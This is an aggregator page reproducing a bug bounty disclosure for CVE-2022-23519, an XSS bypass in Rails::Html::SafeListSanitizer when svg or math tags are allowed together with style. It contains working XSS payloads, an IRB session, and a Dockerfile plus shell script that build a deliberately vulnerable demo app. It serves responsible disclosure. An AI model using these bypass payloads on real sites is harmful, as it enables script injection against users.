Lucene search
0b5cur17yH1:1805899HistoryDec 14, 2022 - 9:22 p.m.
Internet Bug Bounty: CVE-2022-23519: Rails::Html::SafeListSanitizer vulnerable to XSS when certain tags are allowed (math+style || svg+style)
2022-12-1421:22:40
0b5cur17y
hackerone.com
$2400
60
rails
html
sanitizer
xss
vulnerability
svg
math
style
fuzz testing
poc
dockerfile
routes
parameters
EPSS
0.001
Percentile
44.1%
The following is from: https://hackerone.com/reports/1656627
Intro
The Rails HTML sanitzier allows to set certain combinations of tags in it’s allow list that are not properly handled.
Similar to the report 1530898, which identified the combinationselect and style as vulnerable,
my fuzz testing from today suggests that also svg and style as well as math and style allow XSS.
The following are PoCs for each of these allow list:
svgandstyle:<svg><style><script>alert(1)</script></style></svg>mathandstyle:<math><style><img src></style></math>
See the following IRB session:
irb(main):016:0> require 'rails-html-sanitizer'
=> false
irb(main):017:0> Rails::Html::SafeListSanitizer.new.sanitize("<svg><style><script>alert(1)</script></style></svg>", tags: ["svg", "style"]).to_s
=> "<svg><style><script>alert(1)</script></style></svg>"
irb(main):018:0> Rails::Html::SafeListSanitizer.new.sanitize("<math><style><img src></style></math>", tags: ["math", "style"]).to_s
=> "<math><style><img src></style></math>"
irb(main):019:0> puts Rails::Html::Sanitizer::VERSION
1.4.3
=> nil
Sample Vulnerable Rails Application
To build a sample rails application that is vulnerable, I’ve used the following Dockerfile:
FROM ruby:3.1.2
RUN apt-get update && apt-get install -y vim
WORKDIR /usr/src/app
RUN gem install rails && rails new myapp
WORKDIR /usr/src/app/myapp
COPY build-rails-app.sh ./build-rails-app.sh
RUN sh ./build-rails-app.sh
RUN RAILS_ENV=production rails assets:precompile
CMD ["./bin/rails", "server", "-b", "0.0.0.0", "-e", "production"]
In the same directory, put a shell script build-rails-app.sh which writes the app:
#!/ibn/sh
# make routes
cat << EOF > ./config/routes.rb
Rails.application.routes.draw do
get "/poc1", to: "poc1#index"
get "/poc2", to: "poc2#index"
end
EOF
# make Poc1 endpoint
# http://localhost:8888/poc1?name=%3Csvg%3E%3Cstyle%3E%3Cscript%3Ealert(1)%3C/script%3E%3C/style%3E%3Csvg%3E
bin/rails generate controller Poc1 index --skip-routes
cat << EOF > ./app/controllers/poc1_controller.rb
class Poc1Controller < ApplicationController
def index
@name = params[:name] || "put your name here"
end
end
EOF
cat << EOF > ./app/views/poc1/index.html.erb
<h1> Hello <%= sanitize @name, tags: ["svg", "style"] %> </h1>
<br>
PoC with a sanitized, reflected parameter 'name' for which 'svg' annd 'style' tags are allowed.
<br>
<%= link_to "Go to PoC", "/poc1?name=<svg><style><script>alert(1)</script></style><svg>" %>
<br>
<br>
Using: rails-html-sanitizer <%= Rails::Html::Sanitizer::VERSION %>
EOF
# make Poc2 endpoint
# http://localhost:8888/poc2?name=%3Cmath%3E%3Cstyle%3E%3Cimg%20src=x%20onerror=alert(1)%3E%3C/style%3E%3Cmath%3E
bin/rails generate controller Poc2 index --skip-routes
cat << EOF > ./app/controllers/poc2_controller.rb
class Poc2Controller < ApplicationController
def index
@name = params[:name] || "put your name here"
end
end
EOF
cat << EOF > ./app/views/poc2/index.html.erb
<h1> Hello <%= sanitize @name, tags: ["math", "style"] %> </h1>
<br>
PoC with a sanitized, reflected parameter 'name' for which 'math' annd 'style' tags are allowed.
<br>
<%= link_to "Go to PoC", "/poc2?name=<math><style><img src></style><math>" %>
<br>
<br>
Using: rails-html-sanitizer <%= Rails::Html::Sanitizer::VERSION %>
EOF
With the following Makefile you can build and run the application
.PHONY: build
build:
docker build -t local/railspoc:latest .
.PHONY: run
run:
docker run -it --rm -p 127.0.0.1:8888:3000 local/railspoc:latest
Now you have a Rails application with two routes /poc1 and /poc2 running locally. Visit:
- http://localhost:8888/poc1?name=%3Csvg%3E%3Cstyle%3E%3Cscript%3Ealert(1)%3C/script%3E%3C/style%3E%3Csvg%3E
- http://localhost:8888/poc2?name=%3Cmath%3E%3Cstyle%3E%3Cimg%20src=x%20onerror=alert(1)%3E%3C/style%3E%3Cmath%3E
See the screenshot in https://hackerone.com/reports/1656627 for what it will roughly look like. Both alerts should be executed.
Impact
It is possible to bypass Rails::Html::SafeListSanitizer filtering and perform an XSS attack.
Related
nvd
nvd
CVE-2022-23519
2022-12-14 17:15:11
github
github
ubuntucve
ubuntucve
CVE-2022-23519
2022-12-14 00:00:00
osv
osv
CVE-2022-23519
2022-12-14 17:15:11
ruby-rails-html-sanitizer - security update
2023-09-13 00:00:00
redhatcve
redhatcve
CVE-2022-23519
2022-12-15 11:05:04
cve
cve
CVE-2022-23519
2022-12-14 17:15:11
rubygems
rubygems
cvelist
cvelist
hackerone
hackerone
prion
prion
Design/Logic Flaw
2022-12-14 17:15:00
veracode
veracode
Cross-site Scripting (XSS)
2022-12-14 12:47:51
debiancve
debiancve
CVE-2022-23519
2022-12-14 17:15:11
openvas
openvas
Fedora: Security Advisory (FEDORA-2023-91e69ea326)
2024-09-10 00:00:00
openSUSE: Security Advisory for rubygem (SUSE-SU-2023:3714-1)
2024-03-04 00:00:00
Debian: Security Advisory (DLA-3566-1)
2023-09-14 00:00:00
redos
redos
ROS-20240815-13
2024-08-15 00:00:00
nessus
nessus
Fedora 40 : rubygem-rails-html-sanitizer (2023-91e69ea326)
2024-04-29 00:00:00
SUSE SLES15 / openSUSE 15 Security Update : rubygem-rails-html-sanitizer (SUSE-SU-2023:3714-1)
2023-09-21 00:00:00
Debian DLA-3566-1 : ruby-rails-html-sanitizer - LTS security update
2023-09-14 00:00:00
debian
debian
[SECURITY] [DLA 3566-1] ruby-rails-html-sanitizer security update
2023-09-13 15:09:12
rocky
rocky
Satellite 6.13 Release
2023-05-05 15:39:58
redhat
redhat
(RHSA-2023:2097) Important: Satellite 6.13 Release
2023-05-03 13:09:51